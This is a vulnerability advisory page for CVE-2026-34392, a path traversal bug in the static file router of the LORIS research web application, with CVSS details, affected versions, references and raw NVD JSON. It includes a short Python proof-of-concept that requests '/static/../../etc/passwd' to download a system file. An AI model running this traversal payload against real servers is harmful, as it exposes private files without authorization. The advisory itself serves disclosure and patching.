CVE-2026-34392

Description

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static file router can allow an attacker to traverse outside of the intended directory, allowing unintended files to be downloaded through the static, css, and js endpoints. This vulnerability is fixed in 27.0.3 and 28.0.1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:* - VULNERABLE

LORIS >= 20.0.0, < 27.0.3

LORIS >= 28.0.0, < 28.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Replace with actual vulnerable host)
target_host = "http://127.0.0.1:8080"

# Malicious payload exploiting directory traversal via static endpoint
# Attempting to download /etc/passwd
payload = "/static/../../etc/passwd"

full_url = target_host + payload

try:
    response = requests.get(full_url)
    
    if response.status_code == 200:
        print("[+] Exploit successful! File content downloaded:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34392
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34392
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34392/
[4] VulDB https://vuldb.com/cve/CVE-2026-34392
[5] https://github.com/aces/Loris/security/advisories/GHSA-rfj5-58hv-wc5f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34392", "sourceIdentifier": "[email protected]", "published": "2026-04-08T19:25:21.723", "lastModified": "2026-04-17T15:42:49.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static file router can allow an attacker to traverse outside of the intended directory, allowing unintended files to be downloaded through the static, css, and js endpoints. This vulnerability is fixed in 27.0.3 and 28.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-552"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.0.0", "versionEndExcluding": "27.0.3", "matchCriteriaId": "ACBF060E-474B-4952-B802-04BA2FBFB5AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D358B66A-04AC-44F2-8EF6-4332D8AC00F4"}]}]}], "references": [{"url": "https://github.com/aces/Loris/security/advisories/GHSA-rfj5-58hv-wc5f", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}